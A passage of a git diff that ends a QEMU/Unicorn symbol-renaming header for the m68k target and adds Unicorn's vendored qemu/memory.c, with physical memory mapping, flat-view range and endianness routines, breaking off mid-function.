tcg_gen_callN_m68k +#define tcg_gen_code tcg_gen_code_m68k +#define tcg_gen_code_common tcg_gen_code_common_m68k +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_m68k +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_m68k +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_m68k +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_m68k +#define tcg_gen_exit_tb tcg_gen_exit_tb_m68k +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_m68k +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_m68k +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_m68k +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_m68k +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_m68k +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_m68k +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_m68k +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_m68k +#define tcg_gen_goto_tb tcg_gen_goto_tb_m68k +#define tcg_gen_ld_i32 tcg_gen_ld_i32_m68k +#define tcg_gen_ld_i64 tcg_gen_ld_i64_m68k +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_m68k +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_m68k +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_m68k +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_m68k +#define tcg_gen_mov_i32 tcg_gen_mov_i32_m68k +#define tcg_gen_mov_i64 tcg_gen_mov_i64_m68k +#define tcg_gen_movi_i32 tcg_gen_movi_i32_m68k +#define tcg_gen_movi_i64 tcg_gen_movi_i64_m68k +#define tcg_gen_mul_i32 tcg_gen_mul_i32_m68k +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_m68k +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_m68k +#define tcg_gen_neg_i32 tcg_gen_neg_i32_m68k +#define tcg_gen_neg_i64 tcg_gen_neg_i64_m68k +#define tcg_gen_not_i32 tcg_gen_not_i32_m68k +#define tcg_gen_op0 tcg_gen_op0_m68k +#define tcg_gen_op1i tcg_gen_op1i_m68k +#define tcg_gen_op2_i32 tcg_gen_op2_i32_m68k +#define tcg_gen_op2_i64 tcg_gen_op2_i64_m68k +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_m68k +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_m68k +#define tcg_gen_op3_i32 tcg_gen_op3_i32_m68k +#define tcg_gen_op3_i64 tcg_gen_op3_i64_m68k 
+#define tcg_gen_op4_i32 tcg_gen_op4_i32_m68k +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_m68k +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_m68k +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_m68k +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_m68k +#define tcg_gen_op6_i32 tcg_gen_op6_i32_m68k +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_m68k +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_m68k +#define tcg_gen_orc_i32 tcg_gen_orc_i32_m68k +#define tcg_gen_or_i32 tcg_gen_or_i32_m68k +#define tcg_gen_or_i64 tcg_gen_or_i64_m68k +#define tcg_gen_ori_i32 tcg_gen_ori_i32_m68k +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_m68k +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_m68k +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_m68k +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_m68k +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_m68k +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_m68k +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_m68k +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_m68k +#define tcg_gen_sar_i32 tcg_gen_sar_i32_m68k +#define tcg_gen_sari_i32 tcg_gen_sari_i32_m68k +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_m68k +#define tcg_gen_shl_i32 tcg_gen_shl_i32_m68k +#define tcg_gen_shl_i64 tcg_gen_shl_i64_m68k +#define tcg_gen_shli_i32 tcg_gen_shli_i32_m68k +#define tcg_gen_shli_i64 tcg_gen_shli_i64_m68k +#define tcg_gen_shr_i32 tcg_gen_shr_i32_m68k +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_m68k +#define tcg_gen_shr_i64 tcg_gen_shr_i64_m68k +#define tcg_gen_shri_i32 tcg_gen_shri_i32_m68k +#define tcg_gen_shri_i64 tcg_gen_shri_i64_m68k +#define tcg_gen_st_i32 tcg_gen_st_i32_m68k +#define tcg_gen_st_i64 tcg_gen_st_i64_m68k +#define tcg_gen_sub_i32 tcg_gen_sub_i32_m68k +#define tcg_gen_sub_i64 tcg_gen_sub_i64_m68k +#define tcg_gen_subi_i32 tcg_gen_subi_i32_m68k +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_m68k +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_m68k +#define tcg_gen_xor_i32 tcg_gen_xor_i32_m68k +#define tcg_gen_xor_i64 tcg_gen_xor_i64_m68k 
+#define tcg_gen_xori_i32 tcg_gen_xori_i32_m68k +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_m68k +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_m68k +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_m68k +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_m68k +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_m68k +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_m68k +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_m68k +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_m68k +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_m68k +#define tcg_handle_interrupt tcg_handle_interrupt_m68k +#define tcg_init tcg_init_m68k +#define tcg_invert_cond tcg_invert_cond_m68k +#define tcg_la_bb_end tcg_la_bb_end_m68k +#define tcg_la_br_end tcg_la_br_end_m68k +#define tcg_la_func_end tcg_la_func_end_m68k +#define tcg_liveness_analysis tcg_liveness_analysis_m68k +#define tcg_malloc tcg_malloc_m68k +#define tcg_malloc_internal tcg_malloc_internal_m68k +#define tcg_op_defs_org tcg_op_defs_org_m68k +#define tcg_opt_gen_mov tcg_opt_gen_mov_m68k +#define tcg_opt_gen_movi tcg_opt_gen_movi_m68k +#define tcg_optimize tcg_optimize_m68k +#define tcg_out16 tcg_out16_m68k +#define tcg_out32 tcg_out32_m68k +#define tcg_out64 tcg_out64_m68k +#define tcg_out8 tcg_out8_m68k +#define tcg_out_addi tcg_out_addi_m68k +#define tcg_out_branch tcg_out_branch_m68k +#define tcg_out_brcond32 tcg_out_brcond32_m68k +#define tcg_out_brcond64 tcg_out_brcond64_m68k +#define tcg_out_bswap32 tcg_out_bswap32_m68k +#define tcg_out_bswap64 tcg_out_bswap64_m68k +#define tcg_out_call tcg_out_call_m68k +#define tcg_out_cmp tcg_out_cmp_m68k +#define tcg_out_ext16s tcg_out_ext16s_m68k +#define tcg_out_ext16u tcg_out_ext16u_m68k +#define tcg_out_ext32s tcg_out_ext32s_m68k +#define tcg_out_ext32u tcg_out_ext32u_m68k +#define tcg_out_ext8s tcg_out_ext8s_m68k +#define tcg_out_ext8u tcg_out_ext8u_m68k +#define tcg_out_jmp tcg_out_jmp_m68k +#define tcg_out_jxx 
tcg_out_jxx_m68k +#define tcg_out_label tcg_out_label_m68k +#define tcg_out_ld tcg_out_ld_m68k +#define tcg_out_modrm tcg_out_modrm_m68k +#define tcg_out_modrm_offset tcg_out_modrm_offset_m68k +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_m68k +#define tcg_out_mov tcg_out_mov_m68k +#define tcg_out_movcond32 tcg_out_movcond32_m68k +#define tcg_out_movcond64 tcg_out_movcond64_m68k +#define tcg_out_movi tcg_out_movi_m68k +#define tcg_out_op tcg_out_op_m68k +#define tcg_out_pop tcg_out_pop_m68k +#define tcg_out_push tcg_out_push_m68k +#define tcg_out_qemu_ld tcg_out_qemu_ld_m68k +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_m68k +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_m68k +#define tcg_out_qemu_st tcg_out_qemu_st_m68k +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_m68k +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_m68k +#define tcg_out_reloc tcg_out_reloc_m68k +#define tcg_out_rolw_8 tcg_out_rolw_8_m68k +#define tcg_out_setcond32 tcg_out_setcond32_m68k +#define tcg_out_setcond64 tcg_out_setcond64_m68k +#define tcg_out_shifti tcg_out_shifti_m68k +#define tcg_out_st tcg_out_st_m68k +#define tcg_out_tb_finalize tcg_out_tb_finalize_m68k +#define tcg_out_tb_init tcg_out_tb_init_m68k +#define tcg_out_tlb_load tcg_out_tlb_load_m68k +#define tcg_out_vex_modrm tcg_out_vex_modrm_m68k +#define tcg_patch32 tcg_patch32_m68k +#define tcg_patch8 tcg_patch8_m68k +#define tcg_pcrel_diff tcg_pcrel_diff_m68k +#define tcg_pool_reset tcg_pool_reset_m68k +#define tcg_prologue_init tcg_prologue_init_m68k +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_m68k +#define tcg_reg_alloc tcg_reg_alloc_m68k +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_m68k +#define tcg_reg_alloc_call tcg_reg_alloc_call_m68k +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_m68k +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_m68k +#define tcg_reg_alloc_op tcg_reg_alloc_op_m68k +#define tcg_reg_alloc_start tcg_reg_alloc_start_m68k +#define tcg_reg_free 
tcg_reg_free_m68k +#define tcg_reg_sync tcg_reg_sync_m68k +#define tcg_set_frame tcg_set_frame_m68k +#define tcg_set_nop tcg_set_nop_m68k +#define tcg_swap_cond tcg_swap_cond_m68k +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_m68k +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_m68k +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_m68k +#define tcg_target_const_match tcg_target_const_match_m68k +#define tcg_target_init tcg_target_init_m68k +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_m68k +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_m68k +#define tcg_temp_alloc tcg_temp_alloc_m68k +#define tcg_temp_free_i32 tcg_temp_free_i32_m68k +#define tcg_temp_free_i64 tcg_temp_free_i64_m68k +#define tcg_temp_free_internal tcg_temp_free_internal_m68k +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_m68k +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_m68k +#define tcg_temp_new_i32 tcg_temp_new_i32_m68k +#define tcg_temp_new_i64 tcg_temp_new_i64_m68k +#define tcg_temp_new_internal tcg_temp_new_internal_m68k +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_m68k +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_m68k +#define tdb_hash tdb_hash_m68k +#define teecr_write teecr_write_m68k +#define teehbr_access teehbr_access_m68k +#define temp_allocate_frame temp_allocate_frame_m68k +#define temp_dead temp_dead_m68k +#define temps_are_copies temps_are_copies_m68k +#define temp_save temp_save_m68k +#define temp_sync temp_sync_m68k +#define tgen_arithi tgen_arithi_m68k +#define tgen_arithr tgen_arithr_m68k +#define thumb2_logic_op thumb2_logic_op_m68k +#define ti925t_initfn ti925t_initfn_m68k +#define tlb_add_large_page tlb_add_large_page_m68k +#define tlb_flush_entry tlb_flush_entry_m68k +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_m68k +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_m68k +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_m68k +#define 
tlbi_aa64_vaa_write tlbi_aa64_vaa_write_m68k +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_m68k +#define tlbi_aa64_va_write tlbi_aa64_va_write_m68k +#define tlbiall_is_write tlbiall_is_write_m68k +#define tlbiall_write tlbiall_write_m68k +#define tlbiasid_is_write tlbiasid_is_write_m68k +#define tlbiasid_write tlbiasid_write_m68k +#define tlbimvaa_is_write tlbimvaa_is_write_m68k +#define tlbimvaa_write tlbimvaa_write_m68k +#define tlbimva_is_write tlbimva_is_write_m68k +#define tlbimva_write tlbimva_write_m68k +#define tlb_is_dirty_ram tlb_is_dirty_ram_m68k +#define tlb_protect_code tlb_protect_code_m68k +#define tlb_reset_dirty_range tlb_reset_dirty_range_m68k +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_m68k +#define tlb_set_dirty tlb_set_dirty_m68k +#define tlb_set_dirty1 tlb_set_dirty1_m68k +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_m68k +#define tlb_vaddr_to_host tlb_vaddr_to_host_m68k +#define token_get_type token_get_type_m68k +#define token_get_value token_get_value_m68k +#define token_is_escape token_is_escape_m68k +#define token_is_keyword token_is_keyword_m68k +#define token_is_operator token_is_operator_m68k +#define tokens_append_from_iter tokens_append_from_iter_m68k +#define to_qiv to_qiv_m68k +#define to_qov to_qov_m68k +#define tosa_init tosa_init_m68k +#define tosa_machine_init tosa_machine_init_m68k +#define tswap32 tswap32_m68k +#define tswap64 tswap64_m68k +#define type_class_get_size type_class_get_size_m68k +#define type_get_by_name type_get_by_name_m68k +#define type_get_parent type_get_parent_m68k +#define type_has_parent type_has_parent_m68k +#define type_initialize type_initialize_m68k +#define type_initialize_interface type_initialize_interface_m68k +#define type_is_ancestor type_is_ancestor_m68k +#define type_new type_new_m68k +#define type_object_get_size type_object_get_size_m68k +#define type_register_internal type_register_internal_m68k +#define type_table_add type_table_add_m68k +#define 
type_table_get type_table_get_m68k +#define type_table_lookup type_table_lookup_m68k +#define uint16_to_float32 uint16_to_float32_m68k +#define uint16_to_float64 uint16_to_float64_m68k +#define uint32_to_float32 uint32_to_float32_m68k +#define uint32_to_float64 uint32_to_float64_m68k +#define uint64_to_float128 uint64_to_float128_m68k +#define uint64_to_float32 uint64_to_float32_m68k +#define uint64_to_float64 uint64_to_float64_m68k +#define unassigned_io_ops unassigned_io_ops_m68k +#define unassigned_io_read unassigned_io_read_m68k +#define unassigned_io_write unassigned_io_write_m68k +#define unassigned_mem_accepts unassigned_mem_accepts_m68k +#define unassigned_mem_ops unassigned_mem_ops_m68k +#define unassigned_mem_read unassigned_mem_read_m68k +#define unassigned_mem_write unassigned_mem_write_m68k +#define update_spsel update_spsel_m68k +#define v6_cp_reginfo v6_cp_reginfo_m68k +#define v6k_cp_reginfo v6k_cp_reginfo_m68k +#define v7_cp_reginfo v7_cp_reginfo_m68k +#define v7mp_cp_reginfo v7mp_cp_reginfo_m68k +#define v7m_pop v7m_pop_m68k +#define v7m_push v7m_push_m68k +#define v8_cp_reginfo v8_cp_reginfo_m68k +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_m68k +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_m68k +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_m68k +#define vapa_cp_reginfo vapa_cp_reginfo_m68k +#define vbar_write vbar_write_m68k +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_m68k +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_m68k +#define vfp_get_fpcr vfp_get_fpcr_m68k +#define vfp_get_fpscr vfp_get_fpscr_m68k +#define vfp_get_fpsr vfp_get_fpsr_m68k +#define vfp_reg_offset vfp_reg_offset_m68k +#define vfp_set_fpcr vfp_set_fpcr_m68k +#define vfp_set_fpscr vfp_set_fpscr_m68k +#define vfp_set_fpsr vfp_set_fpsr_m68k +#define visit_end_implicit_struct visit_end_implicit_struct_m68k +#define visit_end_list visit_end_list_m68k +#define visit_end_struct visit_end_struct_m68k +#define visit_end_union visit_end_union_m68k 
+#define visit_get_next_type visit_get_next_type_m68k +#define visit_next_list visit_next_list_m68k +#define visit_optional visit_optional_m68k +#define visit_start_implicit_struct visit_start_implicit_struct_m68k +#define visit_start_list visit_start_list_m68k +#define visit_start_struct visit_start_struct_m68k +#define visit_start_union visit_start_union_m68k +#define vmsa_cp_reginfo vmsa_cp_reginfo_m68k +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_m68k +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_m68k +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_m68k +#define vmsa_ttbcr_write vmsa_ttbcr_write_m68k +#define vmsa_ttbr_write vmsa_ttbr_write_m68k +#define write_cpustate_to_list write_cpustate_to_list_m68k +#define write_list_to_cpustate write_list_to_cpustate_m68k +#define write_raw_cp_reg write_raw_cp_reg_m68k +#define X86CPURegister32_lookup X86CPURegister32_lookup_m68k +#define x86_op_defs x86_op_defs_m68k +#define xpsr_read xpsr_read_m68k +#define xpsr_write xpsr_write_m68k +#define xscale_cpar_write xscale_cpar_write_m68k +#define xscale_cp_reginfo xscale_cp_reginfo_m68k +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/memory.c b/ai_anti_malware/unicorn/unicorn-master/qemu/memory.c new file mode 100644 index 0000000..50ebefd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/memory.c @@ -0,0 +1,1616 @@ +/* + * Physical memory management + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + * Contributions after 2012-01-13 are licensed under the terms of the + * GNU GPL, version 2 or (at your option) any later version. 
+ */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "exec/memory.h" +#include "exec/address-spaces.h" +#include "exec/ioport.h" +#include "qapi/visitor.h" +#include "qemu/bitops.h" +#include "qom/object.h" +#include + +#include "exec/memory-internal.h" +#include "exec/ram_addr.h" +#include "sysemu/sysemu.h" + +//#define DEBUG_UNASSIGNED + + +// Unicorn engine +MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms) +{ + MemoryRegion *ram = g_new(MemoryRegion, 1); + + memory_region_init_ram(uc, ram, NULL, "pc.ram", size, perms, &error_abort); + if (ram->ram_addr == -1) + // out of memory + return NULL; + + memory_region_add_subregion(get_system_memory(uc), begin, ram); + + if (uc->current_cpu) + tlb_flush(uc->current_cpu, 1); + + return ram; +} + +MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr) +{ + MemoryRegion *ram = g_new(MemoryRegion, 1); + + memory_region_init_ram_ptr(uc, ram, NULL, "pc.ram", size, ptr); + ram->perms = perms; + if (ram->ram_addr == -1) + // out of memory + return NULL; + + memory_region_add_subregion(get_system_memory(uc), begin, ram); + + if (uc->current_cpu) + tlb_flush(uc->current_cpu, 1); + + return ram; +} + +static void memory_region_update_container_subregions(MemoryRegion *subregion); + +void memory_unmap(struct uc_struct *uc, MemoryRegion *mr) +{ + int i; + target_ulong addr; + Object *obj; + + // Make sure all pages associated with the MemoryRegion are flushed + // Only need to do this if we are in a running state + if (uc->current_cpu) { + for (addr = mr->addr; addr < mr->end; addr += uc->target_page_size) { + tlb_flush_page(uc->current_cpu, addr); + } + } + memory_region_del_subregion(get_system_memory(uc), mr); + + for (i = 0; i < uc->mapped_block_count; i++) { + if (uc->mapped_blocks[i] == mr) { + uc->mapped_block_count--; + //shift remainder of array down over deleted pointer + memmove(&uc->mapped_blocks[i], 
&uc->mapped_blocks[i + 1], sizeof(MemoryRegion*) * (uc->mapped_block_count - i)); + mr->destructor(mr); + obj = OBJECT(mr); + obj->ref = 1; + obj->free = g_free; + g_free((char *)mr->name); + mr->name = NULL; + object_property_del_child(mr->uc, qdev_get_machine(mr->uc), obj, &error_abort); + break; + } + } +} + +int memory_free(struct uc_struct *uc) +{ + MemoryRegion *mr; + Object *obj; + int i; + + for (i = 0; i < uc->mapped_block_count; i++) { + mr = uc->mapped_blocks[i]; + mr->enabled = false; + memory_region_del_subregion(get_system_memory(uc), mr); + mr->destructor(mr); + obj = OBJECT(mr); + obj->ref = 1; + obj->free = g_free; + object_property_del_child(mr->uc, qdev_get_machine(mr->uc), obj, &error_abort); + } + + return 0; +} + +static void memory_init(struct uc_struct *uc) +{ +} + +typedef struct AddrRange AddrRange; + +/* + * Note that signed integers are needed for negative offsetting in aliases + * (large MemoryRegion::alias_offset). + */ +struct AddrRange { + Int128 start; + Int128 size; +}; + +static AddrRange addrrange_make(Int128 start, Int128 size) +{ + AddrRange ar; + ar.start = start; + ar.size = size; + return ar; +} + +static bool addrrange_equal(AddrRange r1, AddrRange r2) +{ + return int128_eq(r1.start, r2.start) && int128_eq(r1.size, r2.size); +} + +static Int128 addrrange_end(AddrRange r) +{ + return int128_add(r.start, r.size); +} + +static bool addrrange_contains(AddrRange range, Int128 addr) +{ + return int128_ge(addr, range.start) + && int128_lt(addr, addrrange_end(range)); +} + +static bool addrrange_intersects(AddrRange r1, AddrRange r2) +{ + return addrrange_contains(r1, r2.start) + || addrrange_contains(r2, r1.start); +} + +static AddrRange addrrange_intersection(AddrRange r1, AddrRange r2) +{ + Int128 start = int128_max(r1.start, r2.start); + Int128 end = int128_min(addrrange_end(r1), addrrange_end(r2)); + return addrrange_make(start, int128_sub(end, start)); +} + +enum ListenerDirection { Forward, Reverse }; + +static bool 
memory_listener_match(MemoryListener *listener, + MemoryRegionSection *section) +{ + return !listener->address_space_filter + || listener->address_space_filter == section->address_space; +} + +#define MEMORY_LISTENER_CALL_GLOBAL(_callback, _direction, ...) \ + do { \ + MemoryListener *_listener; \ + \ + switch (_direction) { \ + case Forward: \ + QTAILQ_FOREACH(_listener, &uc->memory_listeners, link) { \ + if (_listener->_callback) { \ + _listener->_callback(_listener, ##__VA_ARGS__); \ + } \ + } \ + break; \ + case Reverse: \ + QTAILQ_FOREACH_REVERSE(_listener, &uc->memory_listeners, \ + memory_listeners, link) { \ + if (_listener->_callback) { \ + _listener->_callback(_listener, ##__VA_ARGS__); \ + } \ + } \ + break; \ + default: \ + abort(); \ + } \ + } while (0) + +#define MEMORY_LISTENER_CALL(_callback, _direction, _section, ...) \ + do { \ + MemoryListener *_listener; \ + \ + switch (_direction) { \ + case Forward: \ + QTAILQ_FOREACH(_listener, &uc->memory_listeners, link) { \ + if (_listener->_callback \ + && memory_listener_match(_listener, _section)) { \ + _listener->_callback(_listener, _section, ##__VA_ARGS__); \ + } \ + } \ + break; \ + case Reverse: \ + QTAILQ_FOREACH_REVERSE(_listener, &uc->memory_listeners, \ + memory_listeners, link) { \ + if (_listener->_callback \ + && memory_listener_match(_listener, _section)) { \ + _listener->_callback(_listener, _section, ##__VA_ARGS__); \ + } \ + } \ + break; \ + default: \ + abort(); \ + } \ + } while (0) + +/* No need to ref/unref .mr, the FlatRange keeps it alive. 
*/ +#define MEMORY_LISTENER_UPDATE_REGION(fr, as, dir, callback) \ + do { MemoryRegionSection _mrs = MemoryRegionSection_make((fr)->mr, as, (fr)->offset_in_region, \ + (fr)->addr.size, int128_get64((fr)->addr.start), (fr)->readonly); \ + MEMORY_LISTENER_CALL(callback, dir, &_mrs); } while(0); + +/* + MEMORY_LISTENER_CALL(callback, dir, (&(MemoryRegionSection) { \ + .mr = (fr)->mr, \ + .address_space = (as), \ + .offset_within_region = (fr)->offset_in_region, \ + .size = (fr)->addr.size, \ + .offset_within_address_space = int128_get64((fr)->addr.start), \ + .readonly = (fr)->readonly, \ + })) +*/ + +typedef struct FlatRange FlatRange; +typedef struct FlatView FlatView; + +/* Range of memory in the global map. Addresses are absolute. */ +struct FlatRange { + MemoryRegion *mr; + hwaddr offset_in_region; + AddrRange addr; + uint8_t dirty_log_mask; + bool romd_mode; + bool readonly; +}; + +/* Flattened global view of current active memory hierarchy. Kept in sorted + * order. + */ +struct FlatView { + unsigned ref; + FlatRange *ranges; + unsigned nr; + unsigned nr_allocated; +}; + +typedef struct AddressSpaceOps AddressSpaceOps; + +#define FOR_EACH_FLAT_RANGE(var, view) \ + for (var = (view)->ranges; var < (view)->ranges + (view)->nr; ++var) + +static bool flatrange_equal(FlatRange *a, FlatRange *b) +{ + return a->mr == b->mr + && addrrange_equal(a->addr, b->addr) + && a->offset_in_region == b->offset_in_region + && a->romd_mode == b->romd_mode + && a->readonly == b->readonly; +} + +static void flatview_init(FlatView *view) +{ + view->ref = 1; + view->ranges = NULL; + view->nr = 0; + view->nr_allocated = 0; +} + +/* Insert a range into a given position. Caller is responsible for maintaining + * sorting order. 
+ */ +static void flatview_insert(FlatView *view, unsigned pos, FlatRange *range) +{ + if (view->nr == view->nr_allocated) { + view->nr_allocated = MAX(2 * view->nr, 10); + view->ranges = g_realloc(view->ranges, + view->nr_allocated * sizeof(*view->ranges)); + } + memmove(view->ranges + pos + 1, view->ranges + pos, + (view->nr - pos) * sizeof(FlatRange)); + view->ranges[pos] = *range; + memory_region_ref(range->mr); + ++view->nr; +} + +static void flatview_destroy(FlatView *view) +{ + int i; + + for (i = 0; i < view->nr; i++) { + memory_region_unref(view->ranges[i].mr); + } + g_free(view->ranges); + g_free(view); +} + +static void flatview_ref(FlatView *view) +{ + atomic_inc(&view->ref); +} + +static void flatview_unref(FlatView *view) +{ + if (atomic_fetch_dec(&view->ref) == 1) { + flatview_destroy(view); + } +} + +static bool can_merge(FlatRange *r1, FlatRange *r2) +{ + return int128_eq(addrrange_end(r1->addr), r2->addr.start) + && r1->mr == r2->mr + && int128_eq(int128_add(int128_make64(r1->offset_in_region), + r1->addr.size), + int128_make64(r2->offset_in_region)) + && r1->dirty_log_mask == r2->dirty_log_mask + && r1->romd_mode == r2->romd_mode + && r1->readonly == r2->readonly; +} + +/* Attempt to simplify a view by merging adjacent ranges */ +static void flatview_simplify(FlatView *view) +{ + unsigned i, j; + + i = 0; + while (i < view->nr) { + j = i + 1; + while (j < view->nr + && can_merge(&view->ranges[j-1], &view->ranges[j])) { + int128_addto(&view->ranges[i].addr.size, view->ranges[j].addr.size); + ++j; + } + ++i; + memmove(&view->ranges[i], &view->ranges[j], + (view->nr - j) * sizeof(view->ranges[j])); + view->nr -= j - i; + } +} + +static bool memory_region_big_endian(MemoryRegion *mr) +{ +#ifdef TARGET_WORDS_BIGENDIAN + return mr->ops->endianness != DEVICE_LITTLE_ENDIAN; +#else + return mr->ops->endianness == DEVICE_BIG_ENDIAN; +#endif +} + +static bool memory_region_wrong_endianness(MemoryRegion *mr) +{ +#ifdef TARGET_WORDS_BIGENDIAN + return 
mr->ops->endianness == DEVICE_LITTLE_ENDIAN; +#else + return mr->ops->endianness == DEVICE_BIG_ENDIAN; +#endif +} + +static void adjust_endianness(MemoryRegion *mr, uint64_t *data, unsigned size) +{ + if (memory_region_wrong_endianness(mr)) { + switch (size) { + case 1: + break; + case 2: + *data = bswap16(*data); + break; + case 4: + *data = bswap32(*data); + break; + case 8: + *data = bswap64(*data); + break; + default: + abort(); + } + } +} + +static void memory_region_oldmmio_read_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = mr->ops->old_mmio.read[ctz32(size)](mr->opaque, addr); + *value |= (tmp & mask) << shift; +} + +static void memory_region_read_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = mr->ops->read(mr->uc, mr->opaque, addr, size); + *value |= (tmp & mask) << shift; +} + +static void memory_region_oldmmio_write_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = (*value >> shift) & mask; + mr->ops->old_mmio.write[ctz32(size)](mr->opaque, addr, tmp); +} + +static void memory_region_write_accessor(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask) +{ + uint64_t tmp; + + tmp = (*value >> shift) & mask; + mr->ops->write(mr->uc, mr->opaque, addr, tmp, size); +} + +static void access_with_adjusted_size(hwaddr addr, + uint64_t *value, + unsigned size, + unsigned access_size_min, + unsigned access_size_max, + void (*access)(MemoryRegion *mr, + hwaddr addr, + uint64_t *value, + unsigned size, + unsigned shift, + uint64_t mask), + MemoryRegion *mr) +{ + uint64_t access_mask; + unsigned access_size; + unsigned i; + + if (!access_size_min) { + access_size_min = 1; + } + if (!access_size_max) { + access_size_max = 4; + } + + /* FIXME: 
support unaligned access? */ + access_size = MAX(MIN(size, access_size_max), access_size_min); + access_mask = (0-1ULL) >> (64 - access_size * 8); + if (memory_region_big_endian(mr)) { + for (i = 0; i < size; i += access_size) { + access(mr, addr + i, value, access_size, + (size - access_size - i) * 8, access_mask); + } + } else { + for (i = 0; i < size; i += access_size) { + access(mr, addr + i, value, access_size, i * 8, access_mask); + } + } +} + +static AddressSpace *memory_region_to_address_space(MemoryRegion *mr) +{ + AddressSpace *as; + + while (mr->container) { + mr = mr->container; + } + QTAILQ_FOREACH(as, &mr->uc->address_spaces, address_spaces_link) { + if (mr == as->root) { + return as; + } + } + return NULL; +} + +/* Render a memory region into the global view. Ranges in @view obscure + * ranges in @mr. + */ +static void render_memory_region(FlatView *view, + MemoryRegion *mr, + Int128 base, + AddrRange clip, + bool readonly) +{ + MemoryRegion *subregion; + unsigned i; + 